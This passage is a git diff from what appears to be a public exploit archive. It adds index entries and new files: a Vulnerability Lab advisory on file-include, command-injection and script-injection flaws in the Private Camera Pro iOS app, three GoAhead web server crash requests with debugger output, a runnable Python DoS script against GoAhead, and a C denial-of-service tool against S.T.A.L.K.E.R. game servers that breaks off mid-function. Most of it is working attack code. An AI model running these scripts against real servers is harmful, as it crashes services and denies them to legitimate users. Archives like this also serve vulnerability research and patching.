+31908,platforms/php/webapps/31908.txt,"Flat Calendar 1.1 - Multiple Administrative Scripts Authentication Bypass Vulnerabilities",2008-06-11,Crackers_Child,php,webapps,0 +31909,platforms/windows/remote/31909.html,"XChat 2.8.7b - 'ircs://' URI Command Execution Vulnerability",2008-06-13,securfrog,windows,remote,0 +31910,platforms/php/webapps/31910.txt,"vBulletin 3.6.10/3.7.1 - 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-13,anonymous,php,webapps,0 +31915,platforms/linux/dos/31915.py,"GoAhead Web Server 3.1.x - Denial of Service",2014-02-26,"Alaeddine MESBAHI",linux,dos,80 +31916,platforms/php/webapps/31916.txt,"Piwigo 2.6.1 - CSRF Vulnerability",2014-02-26,killall-9,php,webapps,80 +31917,platforms/windows/remote/31917.rb,"Symantec Endpoint Protection Manager - Remote Command Execution",2014-02-26,metasploit,windows,remote,9090 +31918,platforms/multiple/remote/31918.txt,"Crysis 1.21 - 'keyexchange' Packet Information Disclosure Vulnerability",2008-06-15,"Luigi Auriemma",multiple,remote,0 +31919,platforms/multiple/dos/31919.c,"S.T.A.L.K.E.R. 1.0.06 - Remote Denial of Service Vulnerability",2008-06-15,"Luigi Auriemma",multiple,dos,0 +31920,platforms/multiple/remote/31920.txt,"Glub Tech Secure FTP 2.5.15 - 'LIST' Command Directory Traversal Vulnerability",2008-06-13,"Tan Chew Keong",multiple,remote,0 +31921,platforms/multiple/remote/31921.txt,"3D-FTP 8.01 - 'LIST' and 'MLSD' Directory Traversal Vulnerabilities",2008-06-16,"Tan Chew Keong",multiple,remote,0 +31922,platforms/multiple/remote/31922.txt,"GlassFish Application Server resourceNode/customResourceNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31923,platforms/multiple/remote/31923.txt,"GlassFish Application Server resourceNode/externalResourceNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31924,platforms/multiple/remote/31924.txt,"GlassFish Application Server resourceNode/jmsDestinationNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31925,platforms/multiple/remote/31925.txt,"GlassFish Application Server resourceNode/jmsConnectionNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31926,platforms/multiple/remote/31926.txt,"GlassFish Application Server resourceNode/jdbcResourceNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31927,platforms/multiple/remote/31927.txt,"GlassFish Application Server applications/lifecycleModulesNew.jsf - Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31928,platforms/multiple/remote/31928.txt,"GlassFish Application Server resourceNode/jdbcConnectionPoolNew1.jsf Multiple Parameter XSS",2008-06-16,"Eduardo Jorge",multiple,remote,0 +31929,platforms/php/webapps/31929.txt,"SimpleNotes - Multiple Cross Site Scripting Vulnerabilities",2008-06-16,sl4xUz,php,webapps,0 +31930,platforms/windows/local/31930.txt,"No-IP DUC Client for Windows - Local Information Disclosure Vulnerability",2008-06-16,"Charalambous Glafkos",windows,local,0 +31931,platforms/multiple/dos/31931.txt,"Crysis 1.21 - HTTP/XML-RPC Service Remote Denial of Service Vulnerability",2008-06-16,"Luigi Auriemma",multiple,dos,0 +31932,platforms/multiple/dos/31932.txt,"Skulltag 0.97 d2-RC3 - Malformed Packet Denial of Service Vulnerability",2008-06-16,"Luigi Auriemma",multiple,dos,0 +31933,platforms/php/webapps/31933.txt,"OpenDocMan 1.x - 'out.php' Cross-Site Scripting Vulnerability",2008-06-17,"Sergi Rosello",php,webapps,0 +31934,platforms/windows/dos/31934.txt,"Microsoft Word 2000/2002 - Bulleted List Handling Remote Memory Corruption Vulnerability",2008-06-17,"Ivan Sanchez",windows,dos,0 +31935,platforms/php/webapps/31935.txt,"Basic-CMS - 'index.php' SQL Injection Vulnerability",2008-06-17,Mr.SQL,php,webapps,0 +31936,platforms/multiple/remote/31936.txt,"UltraEdit 14.00b - FTP/SFTP 'LIST' Command Directory Traversal Vulnerability",2008-06-17,"Tan Chew Keong",multiple,remote,0 +31937,platforms/php/local/31937.txt,"PHP <= 5.2.6 - chdir Function http URL Argument safe_mode Restriction Bypass",2008-06-18,"Maksymilian Arciemowicz",php,local,0 +31938,platforms/php/webapps/31938.txt,"KEIL Software photokorn 1.542 - 'index.php' SQL Injection Vulnerability",2008-06-18,t@nzo0n,php,webapps,0 +31939,platforms/php/webapps/31939.txt,"vBulletin <= 3.7.1 Moderation Control Panel 'redirect' Parameter Cross-Site Scripting Vulnerability",2008-06-19,"Jessica Hope",php,webapps,0 +31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x AppleScript ARDAgent Shell Local Privilege Escalation Vulnerability",2008-06-19,anonymous,osx,local,0 +31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 +31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 'LIST' Command Directory Traversal Vulnerability",2008-06-20,"Tan Chew Keong",multiple,remote,0 +31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 Cross-Site Scripting Vulnerability and Arbitrary File Upload Vulnerability",2008-06-20,"AmnPardaz ",php,webapps,0 +31944,platforms/php/webapps/31944.txt,"PHPAuction 'profile.php' SQL Injection Vulnerability",2008-06-21,Mr.SQL,php,webapps,0 +31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 'site_absolute_path' Parameter Multiple Remote File Include Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component SQL Injection Vulnerability",2008-06-22,His0k4,php,webapps,0 diff --git a/platforms/hardware/webapps/31900.txt b/platforms/hardware/webapps/31900.txt new file mode 100755 index 000000000..fefe99612 --- /dev/null +++ b/platforms/hardware/webapps/31900.txt @@ -0,0 +1,323 @@ +Document Title: +=============== +Private Camera Pro v5.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +http://www.vulnerability-lab.com/get_content.php?id=1216 + + +Release Date: +============= +2014-02-24 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +1216 + + +Common Vulnerability Scoring System: +==================================== +8.1 + + +Product & Service Introduction: +=============================== +Private Camera is an iPhone and iPad camera app that could protect your privacy. It supports taking photos and recording videos, password +lock protect, Fake password guest mode, share photos anytime and anywhere. Take photos and videos quick and easily. Support autofocus, +tap to focus, flash light switch, camera switch, brand new UI, easy to use. Support taking still photo and recording video. Switch the +video and photo mode one click. Create, rename, delete album, set album cover. Add photos to Album, remove photos from Album. Multiple photos +can be handled at a time, you can import photos from system camera roll, export photos to system camera roll, add photos to album, remove photos +from album, delete multiple photos. Wi-Fi web access for photos upload, you can upload many photos from computer to iPhone or iPad in one shot. +With iOS 5, Private Camera can sync all your photos and videos on your iCloud account, you can access these photos & videos on all your iOS +devices, use and share these photos & videos anytime, everywhere. Protect photos and videos that you don’t want to share. User requires enter +password when access the photos/videos library. Share photos and videos on Twitter, Facebook, Email with your friends. + +With Password-lock functionality, can protect your personal photos and videos. Its unique Pseudo-password(decoy-password) guest mode, +can cope with annoying friends from seeing your private photos and videos. With easy to use camera features, let you using iPhone or +iPad take photos & videos and enjoy your photography life! + +( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-photo-vault/id477970594 ) +( Copy of the Homepage: https://itunes.apple.com/us/app/private-camera-pro-photo-vault/id473538611 ) + + +Abstract Advisory Information: +============================== +The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Private Camera Pro v5.0 iOS mobile web-application. + + +Vulnerability Disclosure Timeline: +================================== +2014-02-24: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Affected Product(s): +==================== +Apple AppStore +Product: Private Camera Pro - iOS Web Application 5.0 + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Technical Details & Description: +================================ +1.1 +A local file include vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application. +The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests +or system specific path commands to compromise the web-application/device. + +The vulnerability is located in the upload module of the mobile web-application web-interface. Remote attackers can +manipulate the `upload > submit` POST method request with the vulnerable `filename` value to compromise the application +or connected device components. The issue allows remote attackers to include local app path values or wifi web-server files. + +The exploitation appears on the application-side and the inject request method is POST. The exection occurs in the main index +file dir list. The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability +scoring system) count of 7.2(+)|(-)7.3. + +Exploitation of the local file include vulnerability requires no user interaction or privileged mobile application user account. +Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise +or web-server compromise. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Upload (UI) & Import (Device Sync) + +Vulnerable Parameter(s): + [+] filename + +Affected Module(s): + [+] File Dir Index Listing + + +1.2 +A local command/path injection web vulnerabilities has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application. +A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application. + +The vulnerability is located in the vulnerable `[devicename] (srvName)` value of the device-info module. Local attackers are able to inject own malicious +system specific commands or path value requests as the physical iOS hardware devicename. The execution of the injected command or path request occurs with +persistent attack vector in the device-info listing module of the web interface. The security risk of the local command/path inject vulnerability is estimated +as high(-) with a cvss (common vulnerability scoring system) count of 6.5(+)|(-)6.6. + +Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction. +Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to +compromise the mobile iOS application or the connected device components. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Content > header-title + +Vulnerable Parameter(s): + [+] devicename + +Affected Module(s): + [+] Index- File Dir Listing + [+] Sub Folder/Category - File Dir Listing + + + +1.3 +A persistent input validation vulnerability has been discovered in the official Private Camera Pro v5.0 iOS mobile web-application. +A persistent input validation vulnerability allows remote attackers to inject own malicious script codes on the application-side +of the affected application web-server. + +The vulnerability is located in the add `New Album` input field. The vulnerability allows remote attackers to inject +own malicious script codes on the application-side of the index path/folder listing. The script code execute occurs +in the index `Albums Index` listing with the vulnerable album_title parameter. The inject can be done local by the device +via add album sync function or remote by an inject via upload in the web-interface. The attack vector is persistent and +the injection request method is POST. The security risk of the persistent input validation web vulnerability in the +albumtitle value is estimated as high(-) with a cvss (common vulnerability scoring system) count of 4.2(+)|(-)4.3. + +Exploitation of the persistent script code inject vulnerability via POST method request requires low user interaction +and no privileged web-interface user account. Only the sync add album sync function of the reproduce via device requires +physical access. + +Request Method(s): + [+] POST + +Vulnerable Module(s): + [+] Albums Add (UI) & Import (Snyc Device) + +Vulnerable Module(s): + [+] album_title + +Affected Module(s): + [+] Album Index & Sub Category Index + + +Proof of Concept (PoC): +======================= +1.1 +the local file include web vulnerability can be exploited by remote attackers without privileged web-application user account or +user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + +PoC: Albums + +
Download
  • +
     +
    • + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost/asset/addAsset Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[462] Mime Type[application/json] + Request Header: + Host[localhost] + User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost/] + Content-Length[24791] + Content-Type[multipart/form-data; boundary=---------------------------27557158176485] + Connection[keep-alive] + Pragma[no-cache] + Cache-Control[no-cache] + POST-Daten: + POST_DATA[-----------------------------27557158176485 +Content-Disposition: form-data; name="params" + +name:Default%20Album|url:82A29591-4E94-4313-B4A6-B527A1A551AE|id:SYS_ALBUM_DEFAULT +-----------------------------27557158176485 +Content-Disposition: form-data; name="files[]"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]" +Content-Type: image/jpeg + + + +1.2 +The local command inject web vulnerability can be exploited by remote attackers with physical device access and without user interaction. +For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: Device Info > device_info_list > srvname > device-info > [devicename] (srvName) + + + +Note: Inject your payload as iOS devicename (phone or ipad). The execution occurs in the device-info section of the web-interface. + + + + +1.2 +The persistent input validation web vulnerability can be exploited by remote attackers with low privileged application user account and +low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. + + +PoC: File Dir Index > album_title + +
    + +Note: Use the sync function when processing to import to inject the persistent code to the file dir index of the web-interface. + + + +Solution - Fix & Patch: +======================= +1.1 +The local file include web vulnerability can be patched by a secure parse and validation of the filename value in the upload file POst method request. + +1.2 +The local command inject web vulnerability can be fixed by a secure encode of the vulnerable devicename value in the service information module. + +1.3 +The persistent input validation web vulnerability can be patched by a secure parse and encode of the vulnerable albumname value. +Restrict the albumname add and rename function to prevent further persistent script code injects via POST method request. + + +Security Risk: +============== +1.1 +The security risk of the local file include web vulnerability is estimated as high(+). + +1.2 +The security risk of the local command inject web vulnerability is estimated as high(-). + +1.3 +The security risk of the persistent input validation web vulnerability is estimated as medium(+). + + +Credits & Authors: +================== +Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com] + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- +Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business +profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some +states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation +may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases +or trade with fraud/stolen material. + +Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com +Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com +Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com +Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php + +Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and +other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), +modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. + + Copyright © 2014 | Vulnerability Laboratory [Evolution Security] + + + +-- +VULNERABILITY LABORATORY RESEARCH TEAM +DOMAIN: www.vulnerability-lab.com +CONTACT: research@vulnerability-lab.com + + diff --git a/platforms/linux/dos/31761.txt b/platforms/linux/dos/31761.txt new file mode 100755 index 000000000..562ecf7cd --- /dev/null +++ b/platforms/linux/dos/31761.txt @@ -0,0 +1,148 @@ +# Title: Embedthis Goahead Webserver multiple DoS vulnerabilities. +# Author: 0in (Maksymilian Motyl) +# Date: 18.02.2014 +# Version: 3.1.3-0 +# Software Link: http://embedthis.com/products/goahead/ +# Download: https://github.com/embedthis/goahead +# Tested on: Linux x32 +# Description: +# "GoAhead is embedded in hundreds of millions of devices and applications like: printers, routers, switches, IP phones, mobile applications, data acquisition, +# military applications and WIFI gateways." +# .... Ok. +# But I cannot confirm any vulnerability in products listed at http://embedthis.com/products/goahead/users.html + +----------------------------------------------- + 1st vulnerability + +*************************************** + +#!/usr/bin/python + +packet="GET /cgi-bin/test/a/c/?"+"#"*1024+".cgi/c.txt HTTP/1.1\r\n"\ +"Host: 127.0.0.1\r\n"\ +"User-Agent: BillyExploiter\r\n"\ +"Accept: text/html\r\n"\ +"Accept-Language: pl\r\n"\ +"Accept-Encoding: gzip, deflate\r\n"\ +"Connection: keep-alive" + +*************************************** + +Program received signal SIGABRT, Aborted. +0xb7772424 in __kernel_vsyscall () +(gdb) bt +#0 0xb7772424 in __kernel_vsyscall () +#1 0xb757d941 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 +#2 0xb7580d72 in *__GI_abort () at abort.c:92 +#3 0xb75b9e15 in __libc_message (do_abort=2, + fmt=0xb7691e70 "*** glibc detected *** %s: %s: 0x%s ***\n") + at ../sysdeps/unix/sysv/linux/libc_fatal.c:189 +#4 0xb75c3f01 in malloc_printerr (action=, + str=0x6
    , ptr=0xb7765dad) at malloc.c:6283 +#5 0xb75c517e in munmap_chunk (p=) at malloc.c:3540 +#6 0xb7752d74 in termWebs (wp=wp@entry=0x8573240, reuse=reuse@entry=1) + at src/http.c:457 +#7 0xb775309c in reuseConn (wp=0x8573240) at src/http.c:520 +#8 complete (wp=wp@entry=0x8573240, reuse=reuse@entry=1) at src/http.c:575 +#9 0xb7754571 in websPump (wp=wp@entry=0x8573240) at src/http.c:837 +#10 0xb7755606 in readEvent (wp=0x8573240) at src/http.c:797 +#11 socketEvent (wptr=0x8573240, mask=2, sid=) at src/http.c:735 + + +*** glibc detected *** goahead: munmap_chunk(): invalid pointer: 0xb7765dad *** + +(gdb) x/xw 0xb7765dad +0xb7765dad: 0x74746800 # "tth" + +----------------------------------------------- + + 2nd vulnerability + +*************************************** + +#!/usr/bin/python +packet="GET http:// HTTP/1.1\r\n" + +# Same crash happens when: +packet="GET http://dupa: HTTP/1.1\r\n" + +*************************************** + + +Program received signal SIGSEGV, Segmentation fault. +websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", + input=input@entry=0xb7756253 "/", len=, len@entry=-1) + at src/http.c:2225 +warning: Source file is more recent than executable. +2225 *op = *ip; +(gdb) bt +#0 websDecodeUrl (decoded=decoded@entry=0xb7756253 "/", + input=input@entry=0xb7756253 "/", len=, len@entry=-1) + at src/http.c:2225 +#1 0xb774248f in websUrlParse (url=0x83bf140 "http", url@entry=0x83cd58c "http://", + pbuf=pbuf@entry=0xbfe6ce14, pprotocol=pprotocol@entry=0x0, + phost=phost@entry=0xbfe6ce00, pport=pport@entry=0xbfe6ce0c, + ppath=ppath@entry=0xbfe6ce08, pext=pext@entry=0xbfe6ce10, + preference=preference@entry=0x0, pquery=pquery@entry=0xbfe6ce04) + at src/http.c:3122 +#2 0xb7745079 in parseFirstLine (wp=0x83bf240) at src/http.c:949 +#3 parseIncoming (wp=0x83bf240) at src/http.c:870 + +(gdb) disas $eip + + 0xb773fb28 <+72>: cmp $0x25,%dl + 0xb773fb2b <+75>: je 0xb773fb70 +=> 0xb773fb2d <+77>: mov %dl,(%esi) + +(gdb) info reg +eax 0x1 1 +ecx 0x13 19 +edx 0x2f 47 +ebx 0xb775e91c -1217009380 +esp 0xbfe6cd20 0xbfe6cd20 +ebp 0xb7756254 0xb7756254 +esi 0xb7756253 -1217043885 +edi 0xb7756253 -1217043885 +eip 0xb773fb2d 0xb773fb2d + +(gdb) x/xw 0xb7756253 +0xb7756253: 0x7473002f + + +----------------------------------------------- + + 3rd vulnerability + +*************************************** + +#!/usr/bin/python +packet="GET http://127.0.0.1/auth/basic/ HTTP/1.1\r\n"\ +"Host: 127.0.0.1\r\n"\ +"Accept: text/html\r\n"\ +"Accept-Language: pl\r\n"\ +"Accept-Encoding: gzip, deflate\r\n"\ +"Connection: keep-alive\r\n" +"Authorization: Basic #\r\n" +*************************************** + +(gdb) bt +#0 strchr () at ../sysdeps/i386/strchr.S:127 +#1 0xb770652a in parseBasicDetails (wp=0x8055240) at src/auth.c:717 +#2 0xb7706c31 in websAuthenticate (wp=wp@entry=0x8055240) at src/auth.c:110 +#3 0xb7717532 in websRouteRequest (wp=wp@entry=0x8055240) at src/route.c:85 + +(gdb) disas $eip + 0xb758799a <+90>: lea 0x0(%esi),%esi + 0xb75879a0 <+96>: add $0x10,%eax +=> 0xb75879a3 <+99>: mov (%eax),%ecx + +(gdb) info reg +eax 0x0 0 +ecx 0x3a3a 14906 +edx 0x3a3a3a3a 976894522 +ebx 0xb772a91c -1217222372 +esp 0xbfc71428 0xbfc71428 +ebp 0x8055240 0x8055240 +esi 0x8055240 134566464 +edi 0x0 0 +eip 0xb75879a3 0xb75879a3 diff --git a/platforms/linux/dos/31915.py b/platforms/linux/dos/31915.py new file mode 100755 index 000000000..ebd87902e --- /dev/null +++ b/platforms/linux/dos/31915.py @@ -0,0 +1,49 @@ +#!/usr/bin/python + +''' +GoAhead Web Server version prior to 3.1.3 is vulnerable to DoS. A fix exists for version 3.2. +The Web Server crashes completely once this requests is received. The vulnerability doesn't seem to be exploitable on Linux versions ... could be wrong :) ! + +Official Issue Post: +https://github.com/embedthis/goahead/issues/77 + +(gdb) bt +#0 0x00007ffff7a50425 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64 +#1 0x00007ffff7a53b8b in __GI_abort () at abort.c:91 +#2 0x00007ffff7a8e39e in __libc_message (do_abort=2, fmt=0x7ffff7b98748 "*** glibc detected *** %s: %s: 0x%s ***\n") at ../sysdeps/unix/sysv/linux/libc_fatal.c:201 +#3 0x00007ffff7a98b96 in malloc_printerr (action=3, str=0x7ffff7b98838 "munmap_chunk(): invalid pointer", ptr=) at malloc.c:5039 +#4 0x00007ffff7fdc607 in termWebs (wp=0x40cfc0, reuse=) at src/http.c:457 +#5 0x00007ffff7fdc91b in reuseConn (wp=0x40cfc0) at src/http.c:520 +#6 complete (wp=0x40cfc0, reuse=1) at src/http.c:575 +#7 0x00007ffff7fdd85f in websPump (wp=0x40cfc0) at src/http.c:837 +#8 0x00007ffff7fdeac8 in readEvent (wp=0x40cfc0) at src/http.c:797 +#9 socketEvent (wptr=0x40cfc0, mask=2, sid=) at src/http.c:735 +#10 socketEvent (sid=, mask=2, wptr=0x40cfc0) at src/http.c:723 +#11 0x00007ffff7fdee38 in websAccept (sid=1, ipaddr=0x7fffffffd990 "127.0.0.1", port=54172, listenSid=) at src/http.c:714 +#12 0x00007ffff7feb66a in socketAccept (sp=0x40cb80) at src/socket.c:327 +#13 0x00007ffff7feb7c8 in socketDoEvent (sp=0x40cb80) at src/socket.c:639 +#14 socketProcess () at src/socket.c:623 +#15 0x00007ffff7fd93ed in websServiceEvents (finished=0x4030f0) at src/http.c:1290 +#16 0x00000000004012ee in main (argc=, argv=0x7fffffffdfd8, envp=) at src/goahead.c:146 +''' + + +import socket +import os +import sys +import struct + +HOST = sys.argv[1] +PORT = int(sys.argv[2]) + +crash = '?'*1 + 'A' * 1000 + +payload = 'GET ' + crash + ' HTTP/1.1\r\n' +payload += 'Host: ' + HOST + ':' + str(PORT) + '\r\n\r\n' + +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect((HOST,PORT)) +expl.send(payload) +data = expl.recv(1024) +print data +expl.close() diff --git a/platforms/multiple/dos/31919.c b/platforms/multiple/dos/31919.c new file mode 100755 index 000000000..8cf7d1693 --- /dev/null +++ b/platforms/multiple/dos/31919.c @@ -0,0 +1,351 @@ +source: http://www.securityfocus.com/bid/29723/info + +S.T.A.L.K.E.R. game servers are prone to a remote denial-of-service vulnerability because the software fails to handle exceptional conditions when processing user nicknames. + +Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include +#include + +#ifdef WIN32 + #include + #include "winerr.h" + + #define close closesocket + #define sleep Sleep + #define ONESEC 1000 +#else + #include + #include + #include + #include + #include + #include + + #define ONESEC 1 +#endif + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; + + + +#define VER "0.1" +#define BUFFSZ 1472 +#define PORT 5445 + + + +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err); +int putcc(u8 *dst, int chr, int len); +int putws(u8 *dst, u8 *src); +int fgetz(FILE *fd, u8 *data, int size); +int getxx(u8 *data, u32 *ret, int bits); +int putxx(u8 *data, u32 num, int bits); +int timeout(int sock, int secs); +u32 resolv(char *host); +void std_err(void); + + + +int main(int argc, char *argv[]) { + struct sockaddr_in peer; + u32 res, + seed; + int sd, + i, + len, + pwdlen, + nicklen, + pck; + u16 port = PORT; + u8 buff[BUFFSZ], + nick[300], // major than 64 + pwd[64] = "", + *p; + +#ifdef WIN32 + WSADATA wsadata; + WSAStartup(MAKEWORD(1,0), &wsadata); +#endif + + setbuf(stdout, NULL); + + fputs("\n" + "S.T.A.L.K.E.R. <= 1.0006 Denial of Service "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 2) { + printf("\n" + "Usage: %s [port(%hu)]\n" + "\n", argv[0], port); + exit(1); + } + + if(argc > 2) port = atoi(argv[2]); + peer.sin_addr.s_addr = resolv(argv[1]); + peer.sin_port = htons(port); + peer.sin_family = AF_INET; + + printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port)); + + seed = time(NULL); + + do { + sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP); + if(sd < 0) std_err(); + + seed = (seed * 0x343FD) + 0x269EC3; + + for(pck = 0; pck <= 4; pck++) { + p = buff; + switch(pck) { + case 0: { + *p++ = 0x88; + *p++ = 0x01; + *p++ = 0x00; + *p++ = 0x00; + p += putxx(p, 0x00010006, 32); // not verified + p += putxx(p, seed, 32); + p += putxx(p, seed, 32); // should be a different number + break; + } + case 1: { + *p++ = 0x80; + *p++ = 0x02; + *p++ = 0x01; + *p++ = 0x00; + p += putxx(p, 0x00010006, 32); // not verified + p += putxx(p, seed, 32); + p += putxx(p, seed, 32); // should be a different number + break; + } + case 2: { + *p++ = 0x3f; + *p++ = 0x02; + *p++ = 0x00; + *p++ = 0x00; + p += putxx(p, seed, 32); + break; + } + case 3: { + memset(nick, 'A', sizeof(nick)); + nick[sizeof(nick) - 1] = 0; + + *p++ = 0x7f; + *p++ = 0x00; + *p++ = 0x01; + *p++ = 0x00; + p += putxx(p, 0x000000c1, 32); + p += putxx(p, 0x00000002, 32); + p += putxx(p, 0x00000007, 32); + p += putcc(p, 0, 0x50);// hash at 0x48 set to zeroes + pwdlen = putws(p, pwd); p += pwdlen; + p += putcc(p, 0, 4); // don't know + strncpy(p, nick, 0x80); p += 0x80; + p += putxx(p, 1, 32); + nicklen = putws(p, nick); p += nicklen; + + putxx(buff + 0x10, 0xe0 + pwdlen, 32); + putxx(buff + 0x14, nicklen, 32); + putxx(buff + 0x18, 0x58 + pwdlen, 32); + if(pwd[0]) putxx(buff + 0x20, 0x58, 32); + putxx(buff + 0x24, pwdlen, 32); + break; + } + case 4: { + *p++ = 0x7f; + *p++ = 0x00; + *p++ = 0x02; + *p++ = 0x02; + p += putxx(p, 0x000000c3, 32); + break; + } + default: break; + } + + len = send_recv(sd, buff, p - buff, buff, BUFFSZ, &peer, 1); + + if(pck == 3) { + while(buff[0] != 0x7f) { + len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1); + } + getxx(buff + 8, &res, 32); + if(res == 0x80158410) { + printf("\n- server is protected by password, insert it: "); + fgetz(stdin, pwd, sizeof(pwd)); + break; + } else if(res == 0x80158610) { + printf("\n server full "); + for(i = 5; i; i--) { + printf("%d\b", i); + sleep(ONESEC); + } + break; + } else if(res == 0x80158260) { + printf("\nError: your IP is banned\n"); + exit(1); + } else if(res) { + printf("\nError: unknown error number (0x%08x)\n", res); + //exit(1); + } + } + } + + close(sd); + } while(pck <= 4); + + printf("\n- done\n"); + return(0); +} + + + +int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) { + int retry = 2, + len; + + if(in) { + while(retry--) { + fputc('.', stdout); + if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in)) + < 0) goto quit; + if(!out) return(0); + if(!timeout(sd, 1)) break; + } + } else { + if(timeout(sd, 3) < 0) retry = -1; + } + + if(retry < 0) { + if(!err) return(-1); + printf("\nError: socket timeout, no reply received\n\n"); + exit(1); + } + + fputc('.', stdout); + len = recvfrom(sd, out, outsz, 0, NULL, NULL); + if(len < 0) goto quit; + return(len); +quit: + if(err) std_err(); + return(-1); +} + + + +int putcc(u8 *dst, int chr, int len) { + memset(dst, chr, len); + return(len); +} + + + +int putws(u8 *dst, u8 *src) { + u8 *d, + *s; + + if(!src[0]) return(0); // as required by stalker + for(s = src, d = dst; ; s++) { + *d++ = *s; + *d++ = 0; + if(!*s) break; + } + return(d - dst); +} + + + +int fgetz(FILE *fd, u8 *data, int size) { + u8 *p; + + if(!fgets(data, size, fd)) return(-1); + for(p = data; *p && (*p != '\n') && (*p != '\r'); p++); + *p = 0; + return(p - data); +} + + + +int getxx(u8 *data, u32 *ret, int bits) { + u32 num; + int i, + bytes; + + bytes = bits >> 3; + for(num = i = 0; i < bytes; i++) { + num |= (data[i] << (i << 3)); + } + *ret = num; + return(bytes); +} + + + +int putxx(u8 *data, u32 num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +int timeout(int sock, int secs) { + struct timeval tout; + fd_set fd_read; + + tout.tv_sec = secs; + tout.tv_usec = 0; + 